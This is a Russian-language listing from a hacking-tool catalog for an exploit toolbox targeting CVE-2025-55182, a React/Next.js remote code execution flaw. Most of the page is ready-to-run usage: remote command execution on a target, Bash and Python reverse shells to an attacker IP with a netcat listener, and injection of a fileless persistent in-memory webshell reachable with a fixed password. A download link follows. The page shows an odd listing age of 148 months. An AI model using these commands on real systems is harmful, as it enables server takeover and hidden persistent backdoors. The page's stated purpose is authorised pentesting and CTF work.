Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Toolbox — Автоматизированный инструмент эксплуатации для CVE-2025-55182 (React/Next.js RCE) с выполнением команд, обнаружением исходящих соединений, интерактивным обратным шеллом и постоянной инъекцией веб-шелла в память для авторизованного тестирования на проникновение и CTF-задач. | Kitploit
Инструменты/GitHubGitHub/lamaper/cve-2025-55182-toolbox
Механизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияCTFТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

Автоматизированный инструмент эксплуатации для CVE-2025-55182 (React/Next.js RCE) с выполнением команд, обнаружением исходящих соединений, интерактивным обратным шеллом и постоянной инъекцией веб-шелла в память для авторизованного тестирования на проникновение и CTF-задач.

Репозиторий
148 месяцев назадЕщё не проверено
Поделиться

React2Shell: Комплексный инструмент для эксплуатации CVE-2025-55182

Автор: lamaper / BITs2Sys

Версия: 1.0.1

Лицензия: MIT

📝 Описание инструмента

Данный инструмент представляет собой автоматизированное средство для пентеста, специально разработанное для CVE-2025-55182 (RCE через загрязнение цепочки прототипов React Server Components / Next.js). Он предназначен для соревнований CTF и авторизованных проектов по безопасности, объединяя возможности проверки уязвимости, обнаружения исходящего трафика, обратного шелла и внедрения память-лошадей (memory shell).

🚀 Основные функции

  • Выполнение команд одной командой (--cmd) : Использует механизм исключений NEXT_REDIRECT для точной передачи результатов выполнения команд в кодировке Base64.
  • Обнаружение исходящего трафика (--check-outbound) : Автоматически проверяет способность целевой системы обращаться к DNS, HTTP и ICMP, помогая выбрать путь атаки.
  • Интерактивный обратный шелл () : Включает два режима реверс-шелла: Bash и Python3, поддерживает асинхронное выполнение для предотвращения зависания HTTP-запросов.
--shell
  • Постоянная память-лошадь (--inject-ms) : Внедряет память-лошадь через перехват механизма диспетчеризации событий Node.js http.Server, не оставляет файлов, поддерживает постоянное управление.
  • Интерфейс взаимодействия с память-лошадью (--ms-cmd) : Режим взаимодействия, независимый от пути эксплуатации уязвимости. После успешного внедрения можно выполнять команды через бэкдор.
  • 🛠️ Установка и зависимости

    Инструмент разработан на Python 3, требуется только установка библиотеки requests.

    root@kitploit:~
    pip install requests
    

    📖 Руководство по использованию

    0. Проверка наличия уязвимости

    https://github.com/assetnote/react2shell-scanner — это полезный инструмент для обнаружения.

    1. Базовое выполнение команд

    Непосредственное получение информации о целевой системе:

    root@kitploit:~
    python exploit.py --url http://target.com/ --cmd "id"
    python exploit.py --url http://target.com/ --cmd "cat /flag"
    

    2. Обнаружение исходящего трафика

    Перед попыткой обратного шелла убедитесь, что целевая система может подключаться к внешней сети:

    root@kitploit:~
    python exploit.py --url http://target.com/ --check-outbound
    

    3. Обратный шелл

    Режим Bash:

    root@kitploit:~
    # На атакующей машине выполните прослушивание: nc -lvnp 4444
    python exploit.py --url http://target.com/ --shell bash --ip <ваш IP> --port 4444
    

    Режим Python:

    root@kitploit:~
    python exploit.py --url http://target.com/ --shell python --ip <ваш IP> --port 4444
    

    4. Использование память-лошади (постоянное)

    Внедрение память-лошади:

    root@kitploit:~
    python exploit.py --url http://target.com/ --inject-ms
    

    Выполнение команд через память-лошадь (используется после успешного внедрения):

    root@kitploit:~
    python exploit.py --url http://target.com/ --ms-cmd "whoami"
    

    Примечание: по умолчанию память-лошадь монтируется на путь /?pass, запускается отправкой POST-запроса с параметром pwd.

    Подключение через AntSword (Китайский муравьиный меч):

    Пароль подключения: pwd, режим подключения: CMDLINUX

    ⚠️ Отказ от ответственности

    Данный инструмент предназначен только для исследований безопасности в рамках законодательства, соревнований CTF и авторизованных пентестов. Запрещается использовать его для нелегальных атак. Все последствия использования инструмента ложатся на пользователя.


    Скачать инструмент